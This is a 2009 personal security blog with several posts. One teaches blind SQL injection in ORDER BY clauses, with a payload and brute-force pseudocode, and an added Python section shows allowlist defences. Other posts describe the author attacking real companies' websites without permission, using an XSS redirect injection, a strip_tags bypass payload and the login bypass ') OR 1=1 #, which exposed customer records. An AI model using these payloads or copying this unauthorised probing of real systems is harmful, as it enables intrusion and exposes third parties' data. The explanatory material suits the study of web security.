Monday, April 20, 2009

SQL Injection inside the ORDER BY clause

Woo, I never really did any research into SQL injection inside the ORDER BY clause. Apparently if you get nothing on your screen, bruteforcing is basically the only way, but how to go about it? Especially if the injection is basically blind, we need something that will make SQL break.

For example, if we have the query: SELECT * FROM users ORDER BY username {injection}

We get raw access to this query by changing ASC or DESC into anything we want.
Injecting the following: ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --

There are two things that could happen. If the query executes normally, you know that the first character of the password has ASCII value 50.

Please note that you need only 1 record; if you have multiple records or cannot escape the LIMIT clause, you might want to use a subquery instead of the direct ASCII(SUBSTRING()) method.

Anyway, back to the query: if the character is incorrect, the following message will appear if mysql_errors() are printed: Subquery returns more than 1 row

So basically you need to write an exploit that, once a query has executed properly, moves on to the next position and remembers the character it just found.

In pseudo code, something like:

function get() {
    define charset
    define emptypassword
    define sql_injection_url_and_string

    for i = 1; i <= length; i++ {              // position in the password
        for x = 0; x < length(charset); x++ {  // candidate character
            if (post(sql_injection_url_and_string)) {
                // The query was successful
                emptypassword = emptypassword + charset(x); // the character that matched at this position
                break; // move to the next position
            }
        }
    }
    print emptypassword;
}
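An added example, not code from the original post: because the identifier and direction after ORDER BY cannot be bound as query parameters, the defence on the application side is an allowlist rather than escaping. The second sort column (created_at), the helper names and the probe check are assumptions made for this example; the payload is the one quoted above.

```python
# Added example (not from the original post): ORDER BY cannot take bound
# parameters, so the sort column and direction must come from an allowlist.
import re

# Constructed mapping for this example; the post itself only uses `username`.
SORT_COLUMNS = {"username": "username", "created": "created_at"}
DIRECTIONS = {"ASC", "DESC"}

# Payload quoted in the post above, used here only to show it is rejected.
PAYLOAD = ("ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,"
           "(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --")


class UnsafeSortInput(ValueError):
    """Raised when a sort key or direction is not on the allowlist."""


def vulnerable_order_by(direction: str) -> str:
    # The pattern the post attacks: raw user input concatenated after ORDER BY.
    return "SELECT * FROM users ORDER BY username " + direction


def safe_order_by(sort_key: str, direction: str = "ASC") -> str:
    """Build the query from allowlisted identifiers only.

    The caller's sort_key is mapped through SORT_COLUMNS, so the text that
    reaches SQL is always a constant we wrote, never the caller's bytes.
    """
    column = SORT_COLUMNS.get(sort_key.strip().lower())
    if column is None:
        raise UnsafeSortInput(f"unknown sort key: {sort_key!r}")
    norm = direction.strip().upper()
    if norm not in DIRECTIONS:
        raise UnsafeSortInput(f"unknown sort direction: {direction!r}")
    return f"SELECT * FROM users ORDER BY `{column}` {norm}"


def is_rejected(sort_key: str, direction: str) -> bool:
    """True if safe_order_by refuses the input (used for self-checks)."""
    try:
        safe_order_by(sort_key, direction)
    except UnsafeSortInput:
        return True
    return False


def looks_like_order_by_probe(direction: str) -> bool:
    """Cheap log/WAF check: a sort direction is one bare token, so commas,
    parentheses, quotes or comment markers mark the request as a probe."""
    return re.search(r"[,()'\"]|--|#|/\*", direction) is not None
```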


I applied this method for finding table names and columns from the information_schema.tables and .columns...

This is the kind of SQL injection I enjoy the most. It's not as easy as a UNION SELECT; it requires some thinking and writing an exploit.

Sunday, April 12, 2009

'HACKLAMER'

Well, two blokes decided to create a new service which made it possible for people to digitally send invoices. Ok, nice, thanks for telling me, I really don't care. If I need something I'll google it. Don't email me with fancy links that register whether a spam email was successful. I don't like that. Sooo, here we go again..

The email contained links to their service; however, inside the link my email address was stored. So they want to know if they should send me more email? Or maybe to see how many of the emails they sent successfully pulled the users to their website.. Anyway, I decided to see if the site was secure, and after some testing I concluded the normal approach didn't work that well.. They clearly took care of the most common vulnerabilities.. So I had to think outside the box and thought: what do they do with the email addresses they register? Right, it has to show up somewhere.. Most likely they made a fancy interface for it! Woo. And they probably never thought of escaping that.. So I injected: ?id=<script>window.location='http://www.mywebsite.nl'</script>

And guess what, within 20 minutes of the injection I got an email from one of the dudes telling me that my "failed" hack attempt has been reported to the police..

In what way did it fail? It might not have executed the script, but the result was exactly the same. He paid a visit to our website. Thank you, come again!

Of course, as you can understand, I analyzed his email and the IP address it came from; I made the mistake of not getting the IPs behind a proxy. Yup, he used a proxy to send me an email. Chicken!

Oh and he blocked my IP for every one of his sites! brr...

Here's what he sent (Dutch):

Message field: We will report your (failed) hack attempt on our website to the police.

30-03-2009 17:27 - HACKLAMER (x.x.x.x): Viewing demo (\')
30-03-2009 17:32 - HACKLAMER (x.x.x.x): Viewing demo (window.location=\'http://www.mywebsite.nl\')
30-03-2009 17:33 - HACKLAMER (x.x.x.x): (window.location=\'http://www.mywebsite.nl\')
Phone field:

IP address: 194.109.22.147
Language selected: Nederlands
Time: 17:42 - 30 Mar 2009

The IP resolves to an xs4all.nl proxy.

He was nice enough to report the log, which indicates he uses a self-made system, since I don't know any tool that will call someone a 'hack lamer'. Anyway, the tool strips tags.. Now that is not safe, my friend. I wonder if:
<scr<script>IPT>window.location='http://www.mywebsite.nl'</SCR</script>IP>
would have worked, since strip_tags() would be kind enough to concatenate the script tags for me.. Too bad the quotes are being escaped. Something lame like <plain<plaintext>text> would have been annoying in that case; being tagged 'hack lamer' would suit ;)

But I'm not there to break things, just to notify people!

Saturday, April 11, 2009

hah, sending 50k emails a day?

Today I got an email from a company which will print your lovely designed business card for an outrageous amount of money.. Now, getting an email isn't that bad; however, I got the email 3 times in the last 2 months, which is in my opinion too much! So I decided to inspect the email a bit closer.. and I noticed that they used a website that sells these kinds of mailing lists.

I'm in it! No! AhH, get me out.. wait.. let's check their website first..
Wow.. 9 errors, all based on file inclusion and SQL injection..

So I managed to get to their login page, and just trying to enter with username ' and password ' gave me the following error:

SELECT `id`, `username` FROM `core__user` WHERE 1 AND (`core__user`.`username` = ''') AND (`core__user`.`active` = 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))' at line 1


How nice of them, printing the entire query for me! The first thing you might notice is: why the hell are they escaping the password but not the username... why?????!??

So looking at the query,
') OR 1=1 --
should do the trick, you'd say... Nope, it didn't.. Apparently they disabled the comment tags -- and /*. But luckily we have a third. Yes! It's the #!
') OR 1=1 #
That let me in with full access to all their customers.. I could see who sent what email and to whom. The company I got the email from sent around 50k emails a day, which is like lol.

Anyway, I reported the error and they said they fixed the 'bug'; they thanked me and told me they removed my email address.. The email address I used to send them an email wasn't even in their database.. Good job. So I replied back to remove the entire mywebsite.nl range.

Friday, April 10, 2009

My first entry

Alright, this will be my first blog item.. The reason why I decided to create a blog is that I enjoy sharing my experience and techniques with others.

So here's my first blog item. A little introduction is in place: my name is Wim Wisselink, I'm currently still studying and I run my own company with a friend whose main focus is making sure that our bank account is not empty!

I'm basically the lead programmer and the one who gets the blame when something breaks. Nevertheless, I enjoy my work as a programmer. I enjoy my work as a penetration tester even more. The moment a server shows an error I get a thrill. The thrill of exploiting it and no... not abusing it... but reporting it.

I often get spam mail which sends me to their website and tells me to buy their product; instead I check their website for vulnerabilities and I make them a counter proposal. Until now.... it never worked. Too bad... So I tried a new approach. Don't bother trying to benefit from it, just tell them what the problem is and they might cut you in on a deal...

Anyway, so far my first entry.